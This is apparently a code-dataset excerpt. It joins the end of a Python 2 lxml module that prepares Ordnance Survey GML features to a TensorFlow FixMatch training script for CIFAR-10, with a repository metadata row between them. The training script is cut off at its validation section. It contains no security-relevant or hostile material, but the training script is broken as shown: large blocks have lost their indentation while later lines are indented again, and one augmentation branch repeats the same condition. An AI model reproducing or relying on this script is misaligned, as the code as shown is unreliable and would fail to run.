            style_code = osmm_topo_style.bnd_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.bnd_style.CalculateStyleDescription(row)
        elif feat_elm.tag == 'CartographicSymbol':
            row = ['', '', '', featureCode]
            style_code = osmm_topo_style.sym_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.sym_style.CalculateStyleDescription(row)
        elif feat_elm.tag == 'CartographicText':
            # Text features additionally get label placement and font
            # elements derived from the text rendering attributes
            anchorPosition = float(self._get_list_of_terms(feat_elm, 'anchorPosition'))
            orientation = float(self._get_list_of_terms(feat_elm, 'orientation'))
            row = ['', '', '', descriptiveGroups, descriptiveTerms, make, anchorPosition, '', '', '', '', '', '', orientation]
            style_code = osmm_topo_style.txt_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.txt_style.CalculateStyleDescription(row)

            # unicode() is the Python 2 builtin; this module targets Python 2
            anchor = osmm_topo_style.txt_style.CalculateAnchor(row)
            elm = etree.SubElement(feat_elm, 'anchor')
            elm.text = unicode(anchor)

            geo_x = osmm_topo_style.txt_style.CalculateGeoX(row)
            elm = etree.SubElement(feat_elm, 'geo_x')
            elm.text = unicode(geo_x)

            geo_y = osmm_topo_style.txt_style.CalculateGeoY(row)
            elm = etree.SubElement(feat_elm, 'geo_y')
            elm.text = unicode(geo_y)

            font_code = osmm_topo_style.txt_style.CalculateFontCode(row)
            elm = etree.SubElement(feat_elm, 'font_code')
            elm.text = unicode(font_code)

            colour_code = osmm_topo_style.txt_style.CalculateColorCode(row)
            elm = etree.SubElement(feat_elm, 'colour_code')
            elm.text = unicode(colour_code)

            rotation = osmm_topo_style.txt_style.CalculateRotation(row)
            elm = etree.SubElement(feat_elm, 'rotation')
            elm.text = unicode(rotation)

        elm = etree.SubElement(feat_elm, "%s" % 'styleCode')
        elm.text = unicode(style_code)
        elm = etree.SubElement(feat_elm, "%s" % 'styleDescription')
        elm.text = unicode(style_description)

        return feat_elm

    def _create_list_of_terms(self, feat_elm, name):
        # Gather every <name> text value and store them as a single
        # delimited string in a new plural <names> element
        text_list = feat_elm.xpath('//%s/text()' % name)
        if len(text_list):
            elm = etree.SubElement(feat_elm, "%ss" % name)
            elm.text = self.list_seperator.join(text_list)
        return feat_elm

    def _get_list_of_terms(self, feat_elm, name):
        # Return every <name> text value joined as a single delimited
        # string, or '' when there are none
        text_list = feat_elm.xpath('//%s/text()' % name)
        if len(text_list):
            return self.list_seperator.join(text_list)
        return ''
class prep_osmm_topo_qgis(prep_osmm_topo):
    """
    Preparation class for OS MasterMap features which in addition to the work
    performed by `prep_osmm_topo` adds QGIS specific label attributes such as
    `qFont` and `qAnchorPos`.
    """
    def __init__(self, filename):
        prep_osmm_topo.__init__(self, filename)

        # AC - define the font per platform. Compare os.name with '==': the
        # original 'is' comparison against a string literal depends on
        # implementation-specific interning and is unreliable.
        if os.name == 'posix':
            # Will probably need different font names
            self.fonts = ('Garamond', 'Arial', 'Roman', 'ScriptC')
        elif os.name == 'nt':
            # Ordnance Survey use
            # 'Lutheran', 'Normal', 'Light Roman', 'Suppressed text'
            self.fonts = ('GothicE', 'Monospac821 BT', 'Consolas', 'ScriptC', 'Arial Narrow')
        else:
            # 'mac' and any other platform; also guarantees self.fonts is
            # always defined (previously an unmatched platform left it unset)
            self.fonts = ('Garamond', 'Arial', 'Roman', 'ScriptC')

        # AC - the possible text placement positions used by QGIS
        self.anchorPosition = ('Bottom Left', 'Left', 'Top Left', 'Bottom',
                               'Over', 'Top', 'Bottom Right', 'Right', 'Top Right')

    def _prepare_feat_elm(self, feat_elm):
        feat_elm = prep_osmm_topo._prepare_feat_elm(self, feat_elm)
        feat_elm = self._add_qgis_elms(feat_elm)

        return feat_elm

    def _add_qgis_elms(self, feat_elm):
        """Add QGIS label elements (qAnchorPos, qFont) to CartographicText."""
        if feat_elm.tag == 'CartographicText':
            text_render_elm = feat_elm.xpath('//textRendering')[0]

            anchor_pos = int(text_render_elm.xpath('./anchorPosition/text()')[0])
            try:
                anchor_pos = self.anchorPosition[anchor_pos]
            except IndexError:
                # Out-of-range code: fall back to the central 'Over'
                # placement. (The original fallback left an int here, which
                # lxml rejects when assigned to .text below.)
                anchor_pos = self.anchorPosition[4]
            elm = etree.SubElement(text_render_elm, 'qAnchorPos')
            elm.text = anchor_pos

            font = int(text_render_elm.xpath('./font/text()')[0])
            try:
                font = self.fonts[font]
            except IndexError:
                font = 'unknown font (%s)' % str(font)
            elm = etree.SubElement(text_render_elm, 'qFont')
            elm.text = font

        return feat_elm
class prep_osmm_itn(prep_osgml):
    """
    Preparation class for OS MasterMap ITN features.

    In addition to the base manipulation, exposes XML attributes of
    reference elements as child elements, and summarises dateTimeQualifier
    elements both as plain text and as JSON.
    """
    def __init__(self, filename):
        prep_osgml.__init__(self, filename)
        self.feat_types = [
            'Road',
            'RoadLink',
            'RoadNode',
            'FerryLink',
            'FerryNode',
            'FerryTerminal',
            'InformationPoint',
            'RoadNodeInformation',
            'RoadLinkInformation',
            'RoadRouteInformation'
        ]

    def _prepare_feat_elm(self, feat_elm):
        feat_elm = prep_osgml._prepare_feat_elm(self, feat_elm)
        feat_elm = self._expose_attributes(feat_elm)
        feat_elm = self._add_datetime_summary(feat_elm)
        feat_elm = self._add_datetime_json(feat_elm)

        return feat_elm

    def _expose_attributes(self, feat_elm):
        """Expose XML attributes of selected reference elements as child
        elements named <tag>_<attribute> so they survive conversion to
        simple features."""
        elm_list = feat_elm.xpath("""//networkMember |
                                     //directedLink |
                                     //directedNode |
                                     //referenceToRoadLink |
                                     //referenceToRoadNode |
                                     //referenceToTopographicArea |
                                     //referenceToNetwork |
                                     //vehicleQualifier/type |
                                     //vehicleQualifier/use""")

        # Default attribute values for optional attributes
        defaults = {
            'directedNode': {'gradeSeparation': '0'},
            'referenceToRoadNode': {'gradeSeparation': '0'}
        }

        for elm in elm_list:
            # Assign default values to optional attributes
            if elm.tag in defaults.keys():
                for key, val in defaults[elm.tag].items():
                    if key not in elm.attrib:
                        elm.attrib[key] = val
            for name in elm.attrib:
                value = elm.get(name)
                name = '%s_%s' % (elm.tag, name)
                # If the element has text content, adding a child would mix
                # text and elements, so attach the new element to the
                # parent instead
                sub_elm = etree.SubElement(elm if not elm.text else elm.getparent(), name)
                sub_elm.text = value

        return feat_elm

    def _add_datetime_summary(self, feat_elm):
        # Render each element as "tag" or "tag: text"
        def elm_str(elm):
            return elm.tag + ((': ' + elm.text) if elm.text else '')

        for elm in feat_elm.xpath('//dateTimeQualifier'):
            # Create a basic summary by listing tag names and values
            value = ', '.join(map(elm_str, elm.xpath(".//*")))
            sub_elm = etree.SubElement(feat_elm, 'dateTimeQualifier_summary')
            sub_elm.text = value

        return feat_elm

    def _add_datetime_json(self, feat_elm):
        """ Add a JSON representation of dateTimeQualifier elements """
        elms = feat_elm.xpath('//dateTimeQualifier')
        if elms:
            # Round-trip through objectify so ObjectifyJSONEncoder can
            # serialise the element tree
            objs = [objectify.fromstring(etree.tostring(elm)) for elm in elms]
            sub_elm = etree.SubElement(feat_elm, 'dateTimeQualifier_json')
            sub_elm.text = ObjectifyJSONEncoder().encode(objs)

        return feat_elm
class prep_addressbase():
    """
    Simple preparation of AddressBase data.
    """
    def __init__(self, inputfile):
        self.inputfile = inputfile
        self.feat_types = ['Address']

    def get_feat_types(self):
        """Return the feature type names handled by this class."""
        return self.feat_types

    def prepare_feature(self, feat_str):
        """Parse a single feature string, manipulate it and serialise it
        back to a UTF-8 string."""
        prepared = self._prepare_feat_elm(etree.fromstring(feat_str))
        return etree.tostring(
            prepared, encoding='UTF-8', pretty_print=True).decode('utf_8')

    def _prepare_feat_elm(self, feat_elm):
        return self._drop_gmlid(feat_elm)

    def _drop_gmlid(self, feat_elm):
        # Remove the gml id attribute (raises KeyError if it is absent)
        feat_elm.attrib.pop('id')
        return feat_elm
class prep_addressbase_premium(prep_addressbase):
    """
    Preparation of AddressBase Premium data.

    Unnests the child records of BasicLandPropertyUnit and Street features
    into standalone member elements, tagging each extracted child with the
    parent's uprn / usrn so they can be related back together.
    """
    def __init__(self, inputfile):
        prep_addressbase.__init__(self, inputfile)
        self.feat_types = ['BasicLandPropertyUnit', 'Street']

    def prepare_feature(self, feat_str):
        # Parse the xml string into something useful
        feat_elm = etree.fromstring(feat_str)

        # Manipulate the feature
        feat_elm = self._prepare_feat_elm(feat_elm)

        # In this instance we are not returning a string representing a single
        # element as we are unnesting features in the AddressBase Premium GML.
        # We end up returning a string of several elements which are wrapped in
        # the output document with either a streetMember or
        # basicLandPropertyUnitMember element which result it valid XML
        elms = [etree.tostring(feat_elm,
                               encoding='UTF-8',
                               pretty_print=True).decode('utf_8')]
        for elm in self.member_elms:
            elms.append(
                etree.tostring(elm, encoding='UTF-8',
                               pretty_print=True).decode('utf_8'))

        return ''.join(elms)

    def _prepare_feat_elm(self, feat_elm):
        feat_elm = prep_addressbase._prepare_feat_elm(self, feat_elm)
        feat_elm = self._to_multipoint(feat_elm)
        # Side effect: stash the extracted children for prepare_feature above
        self.member_elms = self._extract_child_members(feat_elm)

        return feat_elm

    def _to_multipoint(self, feat_elm):
        """ Move Street streetStart and streetEnd Point elements into a
        MultiPoint """
        if feat_elm.tag == 'Street':
            multi_elm = etree.SubElement(etree.SubElement(feat_elm, 'geom'),
                                         'MultiPoint')
            point_elms = feat_elm.xpath('//streetStart/Point|//streetEnd/Point')
            for point_elm in point_elms:
                etree.SubElement(multi_elm, 'pointMember').append(point_elm)

        return feat_elm

    def _extract_child_members(self, feat_elm):
        """ Unnest BLPU and Street feature types adding a reference to uprn or
        usrn as appropriate.

        NOTE(review): assumes feat_elm is always one of the two feat_types;
        for any other tag `child_elms` would be unbound on return. """
        if feat_elm.tag == 'BasicLandPropertyUnit':
            uprn = feat_elm.findtext('uprn')
            child_elms = feat_elm.xpath("""//Classification |
                                           //LandPropertyIdentifier |
                                           //ApplicationCrossReference |
                                           //DeliveryPointAddress |
                                           //Organisation""")
            for elm in child_elms:
                # Detach from the parent, then tag with the parent's uprn
                elm.getparent().remove(elm)
                elm = self._add_lang_elm(elm)
                sub_elm = etree.SubElement(elm, 'uprn')
                sub_elm.text = uprn

        if feat_elm.tag == 'Street':
            usrn = feat_elm.findtext('usrn')
            child_elms = feat_elm.xpath("//StreetDescriptiveIdentifier")
            for elm in child_elms:
                elm.getparent().remove(elm)
                elm = self._add_lang_elm(elm)
                sub_elm = etree.SubElement(elm, 'usrn')
                sub_elm.text = usrn

        return child_elms

    def _add_lang_elm(self, feat_elm):
        # Expose the xml:lang attribute (defaulting to 'en') as a child
        # element on identifier features
        if feat_elm.tag in ['StreetDescriptiveIdentifier', 'LandPropertyIdentifier']:
            elm = etree.SubElement(feat_elm, "lang")
            try:
                lang = feat_elm.xpath('.//@lang')[0]
            except IndexError:
                lang = 'en'
            elm.text = lang

        return feat_elm
class prep_osmm_water():
    """
    Preparation of OSMM Water Layer features.
    """
    def __init__(self, inputfile):
        self.inputfile = inputfile
        self.feat_types = ['WatercourseLink', 'HydroNode']

    def prepare_feature(self, feat_str):
        """Parse a single feature string, manipulate it and serialise it
        back to a UTF-8 string."""
        prepared = self._prepare_feat_elm(etree.fromstring(feat_str))
        return etree.tostring(
            prepared, encoding='UTF-8', pretty_print=True).decode('utf_8')

    def _prepare_feat_elm(self, feat_elm):
        # Apply each manipulation in turn
        for step in (self._add_fid_elm,
                     self._add_filename_elm,
                     self._add_start_end_node_elm,
                     self._add_code_list_values):
            feat_elm = step(feat_elm)
        return feat_elm

    def _add_fid_elm(self, feat_elm):
        # Water layer features carry their identifier in an 'id' attribute
        fid_elm = etree.SubElement(feat_elm, "fid")
        fid_elm.text = feat_elm.get('id')
        return feat_elm

    def _add_filename_elm(self, feat_elm):
        # Record the source file the feature came from
        name_elm = etree.SubElement(feat_elm, "filename")
        name_elm.text = os.path.basename(self.inputfile)
        return feat_elm

    def _add_start_end_node_elm(self, feat_elm):
        # Expose the xlink references to the start/end nodes as child
        # elements, stripping the leading '#'
        for tag in ('startNode', 'endNode'):
            refs = feat_elm.xpath('//%s' % tag)
            if len(refs):
                etree.SubElement(feat_elm, tag).text = refs[0].get('href')[1:]
        return feat_elm

    def _add_code_list_values(self, feat_elm):
        # Resolve code list hrefs of the form '...#value' to their bare value
        pattern = re.compile('#(.*)$')
        code_elms = feat_elm.xpath("""//reasonForChange |
                                      //form |
                                      //provenance |
                                      //levelOfDetail""")
        for code_elm in code_elms:
            matches = pattern.findall(code_elm.get('href'))
            if len(matches):
                code_elm.text = matches[0]
        return feat_elm
class prep_emapsite_addressbase_premium(prep_osgml):
    """
    Prepare emapsite OS AddressBase Premium GML output by FME.
    """
    def __init__(self, inputfile):
        prep_osgml.__init__(self, inputfile)
        # Looking at the sample data it doesn't appear as though the name of
        # the AddressBaseT_Plus feature type is likely to be the same for each
        # supply so as there is only one feature type simply specify the
        # containing featureMember
        self.feat_types = ['featureMember']

    def _prepare_feat_elm(self, feat_elm):
        return self._add_geom(feat_elm)

    def _add_geom(self, feat_elm):
        """ Add a GML Point element to a feature with coordinates taken from
        the x_coordinate and y_coordinate fields """
        x_coord = feat_elm.findtext('.//x_coordinate')
        y_coord = feat_elm.findtext('.//y_coordinate')

        pos_elm = etree.SubElement(feat_elm, 'Pos')
        pos_elm.text = '%s %s' % (x_coord, y_coord)

        pnt_elm = etree.SubElement(feat_elm, 'Point')
        pnt_elm.attrib['srsName'] = 'EPSG:27700'
        pnt_elm.append(pos_elm)

        # Attach the Point to the feature's first child element
        list(feat_elm)[0].append(pnt_elm)

        return feat_elm
class ObjectifyJSONEncoder(json.JSONEncoder):
    """ JSON encoder that can handle simple lxml objectify types,
        based on the original: https://gist.github.com/aisipos/345559, extended
        to accommodate encoding child nodes with the same tag name as a list.

        Usage:

        >>> import json
        >>> import lxml
        >>> from lxml import objectify
        >>> obj = objectify.fromstring("<author><name>W. Shakespeare</name><play>Twelfth Night</play><play>As You Like It</play></author>")
        >>> json.dumps(obj, cls=ObjectifyJSONEncoder)
        '{"play": ["Twelfth Night", "As You Like It"], "name": "W. Shakespeare"}'

    """
    def default(self, o):
        """Return a JSON-serialisable representation of an objectify value,
        delegating to json.JSONEncoder.default (which raises TypeError) for
        anything unrecognised."""
        # Leaf data elements: convert to the matching Python scalar
        if isinstance(o, lxml.objectify.IntElement):
            return int(o)
        if isinstance(o, lxml.objectify.NumberElement) or isinstance(o, lxml.objectify.FloatElement):
            return float(o)
        if isinstance(o, lxml.objectify.ObjectifiedDataElement):
            return str(o)
        if hasattr(o, '__dict__'):
            # objectify elements act like dicts to allow access to child nodes
            # via their tag name. If an element has more than one child of the
            # same name the dict only contains the first value against the tag
            # name; to ensure all children are encoded create a list of child
            # node values and assign it to the key that matches their tag name.
            d = o.__dict__.copy()
            for k in d.keys():
                # len() of an objectify element counts siblings with the same
                # tag, so > 1 indicates a repeated child element
                if len(d[k]) > 1:
                    d[k] = [i for i in d[k]]
            return d
        return json.JSONEncoder.default(self, o)
| [
"walkermatt@longwayaround.org.uk"
] | walkermatt@longwayaround.org.uk |
c0e913617260c8a7f14ec70f417516e956959dab | 2bc23f78fc42d0904e0ed7846da72b5390cb668e | /train.py | cc4b1e7401d51e28bd2f7d4dfa9483c2be7c07dd | [] | no_license | zhao65515/Tensorflow_FixMatch | 120f6f8e2bec5b644cb9d060a7593317abd8a852 | 37a770199564c90e67f0fe08c110b5d3190a15c2 | refs/heads/master | 2022-11-14T03:47:56.261856 | 2020-06-29T04:44:03 | 2020-06-29T04:44:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,409 | py | # Copyright (C) 2020 * Ltd. All rights reserved.
# author : Sanghyeon Jo <josanghyeokn@gmail.com>
import os
import cv2
import sys
import copy
import time
import glob
import json
import random
import pickle
import argparse
import numpy as np
import tensorflow as tf
import multiprocessing as mp
from core.config import *
from core.classifier import *
from core.augment.augmentors import *
from data.loader import *
from data.decoder import *
from data.batch_loader import *
from data.prefetch import *
from data.generator import *
from utility.utils import *
from utility.dataset_utils import *
from utility.tensorflow_utils import *
from utility.timer import *
from utility.logger import *
if __name__ == '__main__':
    #######################################################################################
    # 1. Config
    #######################################################################################
    flags = get_config()
    set_seed(flags.seed)
    # Number of visible GPUs; the graph is later replicated across them round-robin.
    num_gpu = len(flags.use_gpu.split(','))
    os.environ["CUDA_VISIBLE_DEVICES"] = flags.use_gpu
    # Steps per "epoch" (train_kimgs images per epoch at batch_size images/step).
    iteration = flags.train_kimgs // flags.batch_size
    flags.max_iteration = flags.max_epochs * iteration
    # Output locations: checkpoints, text/CSV logs, and tensorboard summaries.
    model_name = 'FixMatch_cifar@{}'.format(flags.number_of_labels)
    model_dir = './experiments/model/{}/'.format(model_name)
    tensorboard_dir = './experiments/tensorboard/{}'.format(model_name)
    ckpt_format = model_dir + '{}.ckpt'
    log_txt_path = model_dir + 'log.txt'
    log_csv_path = model_dir + 'log.csv'
    valid_log_path = model_dir + 'valid_log.csv'
    test_log_path = model_dir + 'test_log.csv'
    if not os.path.isdir(model_dir):
        os.makedirs(model_dir)
    # Truncate any pre-existing text log so each run starts from a clean file.
    if os.path.isfile(log_txt_path):
        open(log_txt_path, 'w').close()
    # log_func = lambda x: print(x)
    log_func = lambda x: log_print(x, log_txt_path)
    csv_log_func = lambda x: csv_print(x, log_csv_path)
    valid_log_func = lambda x: csv_print(x, valid_log_path)
    test_log_func = lambda x: csv_print(x, test_log_path)
    #######################################################################################
    # 1. Dataset
    #######################################################################################
    # CIFAR-10 split into a small labeled set, the unlabeled pool, validation and test.
    labeled_dataset, unlabeled_dataset, valid_dataset, test_dataset = get_dataset_cifar10(flags.number_of_labels)
    #######################################################################################
    # 1.1. Info (Dataset)
    #######################################################################################
    log_func('\n')
    log_func('# labeled_dataset : {}'.format(len(labeled_dataset)))
    log_func('# unlabeled_dataset : {}'.format(len(unlabeled_dataset)))
    log_func('# valid_dataset : {}'.format(len(valid_dataset)))
    log_func('# test_dataset : {}'.format(len(test_dataset)))
#######################################################################################
# 2. Generator & Queue
#######################################################################################
#######################################################################################
# 2.1. Select DataAugmentations.
#######################################################################################
# for weakly augmented function
if flags.weak_augmentation == 'flip_and_crop':
weakly_augment_func = Flip_and_Crop((32, 32))
# for strongly augmented function
if flags.strong_augmentation == 'randaugment':
strongly_augment_func = DataAugmentation([
Flip_and_Crop((32, 32)),
RandAugmentation(),
])
elif flags.strong_augmentation == 'randaugment':
strongly_augment_func = Flip_and_Crop((32, 32))
log_func('1. weakly={}, strongly={}'.format(weakly_augment_func, strongly_augment_func))
log_func('2. weakly={}, strongly={}'.format(flags.weak_augmentation, flags.strong_augmentation))
#######################################################################################
# 2.2. Set option.
#######################################################################################
# for labeled option
labeled_loader_option = {
'debug' : False,
'bShuffle' : True,
'dataset' : labeled_dataset,
'number_of_loading_dataset' : flags.number_of_loading_dataset,
}
labeled_decoder_option = {
'debug' : False,
'use_label' : True,
'augment_func' : weakly_augment_func,
}
labeled_batch_loader_option = {
'debug' : False,
'batch_size' : flags.batch_size,
'batch_length' : 2,
}
# for unlabeled option
unlabeled_loader_option = {
'debug' : False,
'bShuffle' : True,
'dataset' : unlabeled_dataset,
'number_of_loading_dataset' : flags.number_of_loading_dataset,
}
unlabeled_decoder_option = {
'debug' : False,
'use_label' : False,
'augment_func' : [weakly_augment_func, strongly_augment_func],
}
unlabeled_batch_loader_option = {
'debug' : False,
'batch_size' : flags.batch_size * flags.unlabeled_ratio,
'batch_length' : 1,
}
#######################################################################################
# 2.3. Create loader, decoder, batch_loader, and generator
#######################################################################################
labeled_loader = Prefetch_using_queue(lambda q: Loader(q, labeled_loader_option), use_cores = flags.number_of_loader, max_size = flags.max_size_of_loader)
labeled_decoder = Prefetch_using_queue(lambda q: Decoder(q, labeled_loader.main_queue, labeled_decoder_option), use_cores = flags.number_of_labeled_decoder, max_size = flags.max_size_of_labeled_decoder)
labeled_batch_loader = Prefetch_using_queue(lambda q: Batch_Loader(q, labeled_decoder.main_queue, labeled_batch_loader_option), use_cores = flags.number_of_batch_loader, max_size = flags.max_size_of_batch_loader)
unlabeled_loader = Prefetch_using_queue(lambda q: Loader(q, unlabeled_loader_option), use_cores = flags.number_of_loader, max_size = flags.max_size_of_loader)
unlabeled_decoder = Prefetch_using_queue(lambda q: Decoder(q, unlabeled_loader.main_queue, unlabeled_decoder_option), use_cores = flags.number_of_unlabeled_decoder, max_size = flags.max_size_of_unlabeled_decoder)
unlabeled_batch_loader = Prefetch_using_queue(lambda q: Batch_Loader(q, unlabeled_decoder.main_queue, unlabeled_batch_loader_option), use_cores = flags.number_of_batch_loader, max_size = flags.max_size_of_batch_loader)
# create placeholders.
x_image_var = tf.placeholder(tf.float32, [flags.batch_size] + [32, 32, 3])
x_label_var = tf.placeholder(tf.float32, [flags.batch_size, 10])
u_image_var = tf.placeholder(tf.float32, [flags.batch_size * flags.unlabeled_ratio, 2] + [32, 32, 3])
train_generator = Generator({
'labeled_batch_loader' : labeled_batch_loader,
'unlabeled_batch_loader' : unlabeled_batch_loader,
'placeholders' : [x_image_var, x_label_var, u_image_var],
'queue_size' : 5,
})
    #######################################################################################
    # 3. Model
    #######################################################################################
    # 3.1. set parameters.
    classifier_option = {
        'is_training' : True,
        # CIFAR-10 per-channel normalization statistics.
        'mean' : [0.49139968, 0.48215841, 0.44653091],
        'std' : [0.24703223, 0.24348513, 0.26158784],
        'getter' : None,
        'repeat' : 4,
        'scales' : int(np.ceil(np.log2(32))) - 2,
        'filters' : 32,
        'dropout' : 0,
        'classes' : 10,
    }
    classifier_func = lambda x: Classifier(classifier_option).forward(x)['logits']
    # 3.2. build model.
    x_image_op, x_label_op, u_image_op = train_generator.dequeue()
    # concatenate all images which are labeled images, unlabeled images.
    # Order: labeled batch, then all weak views, then all strong views.
    total_image_op = tf.concat([x_image_op, u_image_op[:, 0], u_image_op[:, 1]], axis = 0)
    # interleave
    # Interleaving mixes labeled/unlabeled samples across the per-GPU splits so
    # batch-norm statistics are comparable on every replica.
    skip_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    total_image_op = interleave(total_image_op, 2 * flags.unlabeled_ratio + 1)
    # split 1/8
    image_ops = tf.split(total_image_op, 1 + flags.unlabeled_ratio)
    '''
    [i] build model (gpu_id = 0, device_index = 0, reuse = False)
    [i] build model (gpu_id = 1, device_index = 0, reuse = True)
    [i] build model (gpu_id = 2, device_index = 0, reuse = True)
    [i] build model (gpu_id = 3, device_index = 0, reuse = True)
    [i] build model (gpu_id = 4, device_index = 0, reuse = True)
    [i] build model (gpu_id = 5, device_index = 0, reuse = True)
    [i] build model (gpu_id = 6, device_index = 0, reuse = True)
    [i] build model (gpu_id = 7, device_index = 0, reuse = True)
    [i] logits_op = Tensor("concat_1:0", shape=(960, 10), dtype=float32)
    '''
    # One forward pass per split; variables are shared (reuse=True after the first).
    logits_ops = []
    for gpu_id, image_op in enumerate(image_ops):
        with tf.device(tf.DeviceSpec(device_type = "GPU", device_index = gpu_id % num_gpu)):
            with tf.variable_scope(tf.get_variable_scope(), reuse = gpu_id > 0):
                logits_ops.append(classifier_func(image_op))
        log_func('[i] build model (gpu_id = {}, device_index = {}, reuse = {})'.format(gpu_id, gpu_id % num_gpu, gpu_id > 0))
    logits_op = tf.concat(logits_ops, axis = 0)
    # de-interleave
    # post_ops: only the UPDATE_OPS added by the forward passes above.
    post_ops = [v for v in tf.get_collection(tf.GraphKeys.UPDATE_OPS) if v not in skip_ops]
    logits_op = de_interleave(logits_op, 2 * flags.unlabeled_ratio + 1)
    log_func('[i] logits_op = {}'.format(logits_op))
    # 3.3. calculate labeled loss and unlabeled loss.
    labeled_logits_op = logits_op[:flags.batch_size]
    weak_logits_op, strong_logits_op = tf.split(logits_op[flags.batch_size:], 2)
    # Supervised cross-entropy on the labeled batch.
    labeled_loss_op = tf.nn.softmax_cross_entropy_with_logits(logits = labeled_logits_op, labels = x_label_op)
    labeled_loss_op = tf.reduce_mean(labeled_loss_op)
    # FixMatch: pseudo-labels from the weak view (no gradient), kept only when
    # the max class probability clears the confidence threshold.
    pseudo_labels = tf.stop_gradient(tf.nn.softmax(weak_logits_op, axis = -1))
    pseudo_masks = tf.to_float(tf.greater_equal(tf.reduce_max(pseudo_labels, axis = -1), flags.confidence_threshold))
    unlabeled_loss_op = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = strong_logits_op, labels = tf.argmax(pseudo_labels, axis = -1))
    unlabeled_loss_op = tf.reduce_mean(pseudo_masks * unlabeled_loss_op) * flags.lambda_u
    train_vars = get_model_vars()
    # L2 regularization over conv/dense kernels only (biases/BN excluded).
    l2_reg_loss_op = tf.add_n([tf.nn.l2_loss(var) for var in train_vars if 'kernel' in var.name]) * flags.weight_decay
    loss_op = labeled_loss_op + unlabeled_loss_op + l2_reg_loss_op
    # 3.4. build ema model.
    ema = tf.train.ExponentialMovingAverage(decay = flags.ema_decay)
    ema_op = ema.apply(train_vars)
    # 3.5. evaluate train accuracy.
    train_correct_op = tf.equal(tf.argmax(labeled_logits_op, axis = -1), tf.argmax(x_label_op, axis = -1))
    train_accuracy_op = tf.reduce_mean(tf.cast(train_correct_op, tf.float32)) * 100
    #######################################################################################
    # 3. Optimizer
    #######################################################################################
    global_step = tf.placeholder(tf.float32)
    # Cosine learning-rate decay over the whole run (FixMatch schedule: cos(7*pi*k/16)).
    learning_rate_ratio = tf.clip_by_value(tf.to_float(global_step) / flags.max_iteration, 0, 1)
    learning_rate = flags.init_learning_rate * tf.cos(learning_rate_ratio * (7 * np.pi) / (2 * 8))
    # Run batch-norm update ops before the optimizer step; group with the EMA update.
    with tf.control_dependencies(post_ops):
        train_op = tf.train.MomentumOptimizer(learning_rate, momentum = 0.9, use_nesterov = True).minimize(loss_op, colocate_gradients_with_ops = True)
        train_op = tf.group(train_op, ema_op)
    #######################################################################################
    # 4. Test
    #######################################################################################
    test_image_var = tf.placeholder(tf.float32, [None, 32, 32, 3])
    test_label_var = tf.placeholder(tf.float32, [None, 10])
    test_option = {
        'is_training' : False,
        'mean' : [0.49139968, 0.48215841, 0.44653091],
        'std' : [0.24703223, 0.24348513, 0.26158784],
        # Evaluation reads the EMA shadow weights instead of the raw variables.
        'getter' : get_getter(ema),
        'repeat' : 4,
        'scales' : int(np.ceil(np.log2(32))) - 2,
        'filters' : 32,
        'dropout' : 0,
        'classes' : 10,
    }
    classifier_func = lambda x: Classifier(test_option).forward(x)['predictions']
    with tf.device(tf.DeviceSpec(device_type = "GPU", device_index = 0)):
        with tf.variable_scope(tf.get_variable_scope(), reuse = True):
            predictions_op = classifier_func(test_image_var)
    test_correct_op = tf.equal(tf.argmax(predictions_op, axis = -1), tf.argmax(test_label_var, axis = -1))
    test_accuracy_op = tf.reduce_mean(tf.cast(test_correct_op, tf.float32)) * 100
#######################################################################################
# 5. Tensorboard
#######################################################################################
train_summary_dic = {
'losses/total_loss' : loss_op,
'losses/labeled_loss' : labeled_loss_op,
'losses/unlabeled_loss' : unlabeled_loss_op,
'losses/l2_regularization' : l2_reg_loss_op,
'monitors/train_accuracy' : train_accuracy_op,
'monitors/learning_rate' : learning_rate,
'monitors/pseudo_mask' : tf.reduce_mean(pseudo_masks),
}
train_summary_op = tf.summary.merge([tf.summary.scalar(name, train_summary_dic[name]) for name in train_summary_dic.keys()])
train_writer = tf.summary.FileWriter(tensorboard_dir)
#######################################################################################
# 6. create Session and Saver
#######################################################################################
sess = tf.Session()
coord = tf.train.Coordinator()
saver = tf.train.Saver(max_to_keep = 2)
#######################################################################################
# 7. initialize
#######################################################################################
sess.run(tf.global_variables_initializer())
labeled_loader.start()
labeled_decoder.start()
labeled_batch_loader.start()
log_func('[i] labeled objects = {}'.format([labeled_loader, labeled_decoder, labeled_batch_loader]))
unlabeled_loader.start()
unlabeled_decoder.start()
unlabeled_batch_loader.start()
log_func('[i] unlabeled objects = {}'.format([unlabeled_loader, unlabeled_decoder, unlabeled_batch_loader]))
train_generator.set_session(sess)
train_generator.set_coordinator(coord)
train_generator.start()
#######################################################################################
# 8. Train
#######################################################################################
best_valid_accuracy = 0.0
best_test_accuracy = 0.0
train_timer = Timer()
valid_timer = Timer()
test_timer = Timer()
train_logger = Logger(
[
'total_loss',
'labeled_loss',
'unlabeled_loss',
'l2_regularization',
'train_accuracy',
],
[
'total_loss={:04.6f}',
'labeled_loss={:04.6f}',
'unlabeled_loss={:04.6f}',
'l2_regularization={:04.6f}',
'train_accuracy={:02.2f}%',
]
)
valid_logger = Logger(['Accuracy'],['valid_accuracy={:02.2f}%'])
test_logger = Logger(['Accuracy'],['test_accuracy={:02.2f}%'])
csv_log_func(train_logger.names)
valid_log_func(valid_logger.names)
test_log_func(test_logger.names)
train_timer.tik()
train_ops = [
train_op,
loss_op,
labeled_loss_op,
unlabeled_loss_op,
l2_reg_loss_op,
train_accuracy_op,
train_summary_op
]
    for step in range(1, flags.max_iteration + 1):
        data = sess.run(train_ops, feed_dict = {
            global_step : step,
        })
        # data[1:-1] are the scalar metrics; data[-1] is the serialized summary.
        train_logger.update(data[1:-1])
        train_writer.add_summary(data[-1], step)
        if step % flags.log_iteration == 0:
            # Queue sizes are logged to spot data-pipeline stalls.
            loader_size = unlabeled_loader.get_size()
            decoder_size = unlabeled_decoder.get_size()
            batch_loader_size = unlabeled_batch_loader.get_size()
            log_string = train_logger.log()
            log_string = '[i] step={} '.format(step) + log_string
            log_string += 'loader_size={} '.format(loader_size)
            log_string += 'decoder_size={} '.format(decoder_size)
            log_string += 'batch_loader_size={} '.format(batch_loader_size)
            log_string += 'train_sec={}sec '.format(train_timer.tok())
            log_func(log_string)
            csv_log_func(train_logger.get_data())
            train_logger.clear()
            train_timer.tik()
        #######################################################################################
        # 10. Validation
        #######################################################################################
